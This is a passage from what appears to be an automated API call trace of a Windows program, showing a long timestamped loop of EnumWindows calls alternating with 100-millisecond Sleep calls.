lParam=0x2830000) [0214.109] Sleep (dwMilliseconds=0x64) [0214.117] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.117] Sleep (dwMilliseconds=0x64) [0214.119] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.120] Sleep (dwMilliseconds=0x64) [0214.122] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.122] Sleep (dwMilliseconds=0x64) [0214.125] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.125] Sleep (dwMilliseconds=0x64) [0214.128] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.128] Sleep (dwMilliseconds=0x64) [0214.135] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.135] Sleep (dwMilliseconds=0x64) [0214.138] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.138] Sleep (dwMilliseconds=0x64) [0214.171] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.171] Sleep (dwMilliseconds=0x64) [0214.198] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.199] Sleep (dwMilliseconds=0x64) [0214.318] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.319] Sleep (dwMilliseconds=0x64) [0214.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.428] Sleep (dwMilliseconds=0x64) [0214.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.512] Sleep (dwMilliseconds=0x64) [0214.551] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.551] Sleep (dwMilliseconds=0x64) [0214.589] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.589] Sleep (dwMilliseconds=0x64) [0214.632] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.633] Sleep (dwMilliseconds=0x64) [0214.671] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.671] Sleep (dwMilliseconds=0x64) [0214.676] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.677] Sleep (dwMilliseconds=0x64) [0214.681] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.682] Sleep (dwMilliseconds=0x64) [0214.685] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.685] Sleep (dwMilliseconds=0x64) [0214.690] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.691] Sleep (dwMilliseconds=0x64) [0214.697] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.698] Sleep (dwMilliseconds=0x64) [0214.702] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.702] Sleep (dwMilliseconds=0x64) [0214.706] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.706] Sleep (dwMilliseconds=0x64) [0214.717] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.718] Sleep (dwMilliseconds=0x64) [0214.729] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.729] Sleep (dwMilliseconds=0x64) [0214.745] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.746] Sleep (dwMilliseconds=0x64) [0214.773] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.773] Sleep (dwMilliseconds=0x64) [0214.846] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.847] Sleep (dwMilliseconds=0x64) [0214.955] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.956] Sleep (dwMilliseconds=0x64) [0214.995] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.996] Sleep (dwMilliseconds=0x64) [0215.047] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.047] Sleep (dwMilliseconds=0x64) [0215.086] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.086] Sleep (dwMilliseconds=0x64) [0215.123] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.124] Sleep (dwMilliseconds=0x64) [0215.128] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.128] Sleep (dwMilliseconds=0x64) [0215.132] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.133] Sleep (dwMilliseconds=0x64) [0215.135] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.136] Sleep (dwMilliseconds=0x64) [0215.145] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.146] Sleep (dwMilliseconds=0x64) [0215.170] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.170] Sleep (dwMilliseconds=0x64) [0215.173] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.173] Sleep (dwMilliseconds=0x64) [0215.177] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.178] Sleep (dwMilliseconds=0x64) [0215.180] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.180] Sleep (dwMilliseconds=0x64) [0215.186] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.186] Sleep (dwMilliseconds=0x64) [0215.194] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.194] Sleep (dwMilliseconds=0x64) [0215.198] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.198] Sleep (dwMilliseconds=0x64) [0215.201] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.202] Sleep (dwMilliseconds=0x64) [0215.204] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.205] Sleep (dwMilliseconds=0x64) [0215.210] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.210] Sleep (dwMilliseconds=0x64) [0215.218] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.219] Sleep (dwMilliseconds=0x64) [0215.222] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.222] Sleep (dwMilliseconds=0x64) [0215.261] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.261] Sleep (dwMilliseconds=0x64) [0215.301] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.301] Sleep (dwMilliseconds=0x64) [0215.339] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.340] Sleep (dwMilliseconds=0x64) [0215.393] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.393] Sleep (dwMilliseconds=0x64) [0215.507] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.507] Sleep (dwMilliseconds=0x64) [0215.582] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.583] Sleep (dwMilliseconds=0x64) [0215.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.702] Sleep (dwMilliseconds=0x64) [0215.776] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.776] Sleep (dwMilliseconds=0x64) [0215.816] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.816] Sleep (dwMilliseconds=0x64) [0215.862] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.862] Sleep (dwMilliseconds=0x64) [0215.906] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.906] Sleep (dwMilliseconds=0x64) [0215.946] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0215.946] Sleep (dwMilliseconds=0x64) [0216.005] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.007] Sleep (dwMilliseconds=0x64) [0216.075] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.076] Sleep (dwMilliseconds=0x64) [0216.085] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.085] Sleep (dwMilliseconds=0x64) [0216.089] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.090] Sleep (dwMilliseconds=0x64) [0216.093] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.093] Sleep (dwMilliseconds=0x64) [0216.097] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.098] Sleep (dwMilliseconds=0x64) [0216.102] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.102] Sleep (dwMilliseconds=0x64) [0216.107] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.108] Sleep (dwMilliseconds=0x64) [0216.119] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.120] Sleep (dwMilliseconds=0x64) [0216.125] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.125] Sleep (dwMilliseconds=0x64) [0216.131] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.131] Sleep (dwMilliseconds=0x64) [0216.134] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.135] Sleep (dwMilliseconds=0x64) [0216.138] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.138] Sleep (dwMilliseconds=0x64) [0216.142] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.143] Sleep (dwMilliseconds=0x64) [0216.208] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.209] Sleep (dwMilliseconds=0x64) [0216.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.250] Sleep (dwMilliseconds=0x64) [0216.291] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.292] Sleep (dwMilliseconds=0x64) [0216.334] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.334] Sleep (dwMilliseconds=0x64) [0216.373] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.373] Sleep (dwMilliseconds=0x64) [0216.413] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.414] Sleep (dwMilliseconds=0x64) [0216.454] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.454] Sleep (dwMilliseconds=0x64) [0216.493] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.493] Sleep (dwMilliseconds=0x64) [0216.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.531] Sleep (dwMilliseconds=0x64) [0216.535] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.535] Sleep (dwMilliseconds=0x64) [0216.539] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.539] Sleep (dwMilliseconds=0x64) [0216.544] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.544] Sleep (dwMilliseconds=0x64) [0216.569] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.570] Sleep (dwMilliseconds=0x64) [0216.600] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.601] Sleep (dwMilliseconds=0x64) [0216.793] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.794] Sleep (dwMilliseconds=0x64) [0216.889] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.889] Sleep (dwMilliseconds=0x64) [0216.952] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0216.952] Sleep (dwMilliseconds=0x64) [0217.056] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.057] Sleep (dwMilliseconds=0x64) [0217.101] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.101] Sleep (dwMilliseconds=0x64) [0217.143] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.143] Sleep (dwMilliseconds=0x64) [0217.240] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.241] Sleep (dwMilliseconds=0x64) [0217.284] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.284] Sleep (dwMilliseconds=0x64) [0217.298] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.299] Sleep (dwMilliseconds=0x64) [0217.306] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.306] Sleep (dwMilliseconds=0x64) [0217.312] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.313] Sleep (dwMilliseconds=0x64) [0217.317] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.317] Sleep (dwMilliseconds=0x64) [0217.326] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.327] Sleep (dwMilliseconds=0x64) [0217.329] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.329] Sleep (dwMilliseconds=0x64) [0217.333] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.334] Sleep (dwMilliseconds=0x64) [0217.345] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.345] Sleep (dwMilliseconds=0x64) [0217.353] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.353] Sleep (dwMilliseconds=0x64) [0217.356] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.357] Sleep (dwMilliseconds=0x64) [0217.360] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.361] Sleep (dwMilliseconds=0x64) [0217.364] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.365] Sleep (dwMilliseconds=0x64) [0217.368] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.368] Sleep (dwMilliseconds=0x64) [0217.371] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.371] Sleep (dwMilliseconds=0x64) [0217.399] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.400] Sleep (dwMilliseconds=0x64) [0217.463] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.463] Sleep (dwMilliseconds=0x64) [0217.540] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.540] Sleep (dwMilliseconds=0x64) [0217.638] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.638] Sleep (dwMilliseconds=0x64) [0217.714] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.714] Sleep (dwMilliseconds=0x64) [0217.754] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.755] Sleep (dwMilliseconds=0x64) [0217.792] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.793] Sleep (dwMilliseconds=0x64) [0217.808] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.808] Sleep (dwMilliseconds=0x64) [0217.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.814] Sleep (dwMilliseconds=0x64) [0217.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.820] Sleep (dwMilliseconds=0x64) [0217.823] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.823] Sleep (dwMilliseconds=0x64) [0217.826] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.826] Sleep (dwMilliseconds=0x64) [0217.829] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.829] Sleep (dwMilliseconds=0x64) [0217.832] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.832] Sleep (dwMilliseconds=0x64) [0217.849] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.849] Sleep (dwMilliseconds=0x64) [0217.893] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.894] Sleep (dwMilliseconds=0x64) [0217.950] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0217.950] Sleep (dwMilliseconds=0x64) [0218.086] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.086] Sleep (dwMilliseconds=0x64) [0218.190] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.190] Sleep (dwMilliseconds=0x64) [0218.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.278] Sleep (dwMilliseconds=0x64) [0218.335] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.335] Sleep (dwMilliseconds=0x64) [0218.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.374] Sleep (dwMilliseconds=0x64) [0218.415] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.416] Sleep (dwMilliseconds=0x64) [0218.434] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.434] Sleep (dwMilliseconds=0x64) [0218.440] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.440] Sleep (dwMilliseconds=0x64) [0218.444] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.444] Sleep (dwMilliseconds=0x64) [0218.448] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.449] Sleep (dwMilliseconds=0x64) [0218.451] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.451] Sleep (dwMilliseconds=0x64) [0218.453] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.453] Sleep (dwMilliseconds=0x64) [0218.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.456] Sleep (dwMilliseconds=0x64) [0218.460] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.460] Sleep (dwMilliseconds=0x64) [0218.465] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.465] Sleep (dwMilliseconds=0x64) [0218.470] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.470] Sleep (dwMilliseconds=0x64) [0218.473] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.473] Sleep (dwMilliseconds=0x64) [0218.476] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.477] Sleep (dwMilliseconds=0x64) [0218.481] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.481] Sleep (dwMilliseconds=0x64) [0218.484] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.485] Sleep (dwMilliseconds=0x64) [0218.488] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.488] Sleep (dwMilliseconds=0x64) [0218.491] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.492] Sleep (dwMilliseconds=0x64) [0218.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.497] Sleep (dwMilliseconds=0x64) [0218.502] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.502] Sleep (dwMilliseconds=0x64) [0218.505] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.505] Sleep (dwMilliseconds=0x64) [0218.509] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.509] Sleep (dwMilliseconds=0x64) [0218.528] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.528] Sleep (dwMilliseconds=0x64) [0218.554] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.554] Sleep (dwMilliseconds=0x64) [0218.630] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.630] Sleep (dwMilliseconds=0x64) [0218.748] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.748] Sleep (dwMilliseconds=0x64) [0218.818] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.818] Sleep (dwMilliseconds=0x64) [0218.861] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.862] Sleep (dwMilliseconds=0x64) [0218.900] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.900] Sleep (dwMilliseconds=0x64) [0218.943] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.944] Sleep (dwMilliseconds=0x64) [0218.986] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0218.987] Sleep (dwMilliseconds=0x64) [0219.076] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.077] Sleep (dwMilliseconds=0x64) [0219.092] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.092] Sleep (dwMilliseconds=0x64) [0219.096] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.096] Sleep (dwMilliseconds=0x64) [0219.099] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.099] Sleep (dwMilliseconds=0x64) [0219.109] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.109] Sleep (dwMilliseconds=0x64) [0219.113] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.113] Sleep (dwMilliseconds=0x64) [0219.176] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.176] Sleep (dwMilliseconds=0x64) [0219.242] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.242] Sleep (dwMilliseconds=0x64) [0219.317] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.318] Sleep (dwMilliseconds=0x64) [0219.393] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.394] Sleep (dwMilliseconds=0x64) [0219.469] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.470] Sleep (dwMilliseconds=0x64) [0219.538] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.539] Sleep (dwMilliseconds=0x64) [0219.580] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.580] Sleep (dwMilliseconds=0x64) [0219.619] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.619] Sleep (dwMilliseconds=0x64) [0219.660] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.660] Sleep (dwMilliseconds=0x64) [0219.674] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.674] Sleep (dwMilliseconds=0x64) [0219.681] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.681] Sleep (dwMilliseconds=0x64) [0219.685] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.685] Sleep (dwMilliseconds=0x64) [0219.688] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.688] Sleep (dwMilliseconds=0x64) [0219.691] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.691] Sleep (dwMilliseconds=0x64) [0219.707] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.707] Sleep (dwMilliseconds=0x64) [0219.716] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.716] Sleep (dwMilliseconds=0x64) [0219.727] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.727] Sleep (dwMilliseconds=0x64) [0219.755] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.755] Sleep (dwMilliseconds=0x64) [0219.792] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.793] Sleep (dwMilliseconds=0x64) [0219.900] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.901] Sleep (dwMilliseconds=0x64) [0219.977] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0219.977] Sleep (dwMilliseconds=0x64) [0220.028] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.028] Sleep (dwMilliseconds=0x64) [0220.083] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.083] Sleep (dwMilliseconds=0x64) [0220.126] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.126] Sleep (dwMilliseconds=0x64) [0220.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.298] Sleep (dwMilliseconds=0x64) [0220.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.375] Sleep (dwMilliseconds=0x64) [0220.419] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.419] Sleep (dwMilliseconds=0x64) [0220.457] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.457] Sleep (dwMilliseconds=0x64) [0220.498] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.499] Sleep (dwMilliseconds=0x64) [0220.540] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.540] Sleep (dwMilliseconds=0x64) [0220.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.615] Sleep (dwMilliseconds=0x64) [0220.677] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.677] Sleep (dwMilliseconds=0x64) [0220.724] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.724] Sleep (dwMilliseconds=0x64) [0220.764] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.764] Sleep (dwMilliseconds=0x64) [0220.804] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.805] Sleep (dwMilliseconds=0x64) [0220.857] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.857] Sleep (dwMilliseconds=0x64) [0220.927] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0220.928] Sleep (dwMilliseconds=0x64) [0221.005] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.006] Sleep (dwMilliseconds=0x64) [0221.058] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.058] Sleep (dwMilliseconds=0x64) [0221.111] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.111] Sleep (dwMilliseconds=0x64) [0221.211] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.211] Sleep (dwMilliseconds=0x64) [0221.290] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.290] Sleep (dwMilliseconds=0x64) [0221.334] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.334] Sleep (dwMilliseconds=0x64) [0221.423] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.423] Sleep (dwMilliseconds=0x64) [0221.464] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.465] Sleep (dwMilliseconds=0x64) [0221.506] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.506] Sleep (dwMilliseconds=0x64) [0221.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.547] Sleep (dwMilliseconds=0x64) [0221.573] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.574] Sleep (dwMilliseconds=0x64) [0221.577] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.578] Sleep (dwMilliseconds=0x64) [0221.581] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.581] Sleep (dwMilliseconds=0x64) [0221.587] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.587] Sleep (dwMilliseconds=0x64) [0221.591] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.591] Sleep (dwMilliseconds=0x64) [0221.595] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.595] Sleep (dwMilliseconds=0x64) [0221.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.603] Sleep (dwMilliseconds=0x64) [0221.606] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.606] Sleep (dwMilliseconds=0x64) [0221.611] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.611] Sleep (dwMilliseconds=0x64) [0221.618] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.618] Sleep (dwMilliseconds=0x64) [0221.620] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.620] Sleep (dwMilliseconds=0x64) [0221.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.626] Sleep (dwMilliseconds=0x64) [0221.646] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.646] Sleep (dwMilliseconds=0x64) [0221.674] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.674] Sleep (dwMilliseconds=0x64) [0221.756] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.756] Sleep (dwMilliseconds=0x64) [0221.831] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.832] Sleep (dwMilliseconds=0x64) [0221.928] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0221.928] Sleep (dwMilliseconds=0x64) [0222.001] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0222.001] Sleep 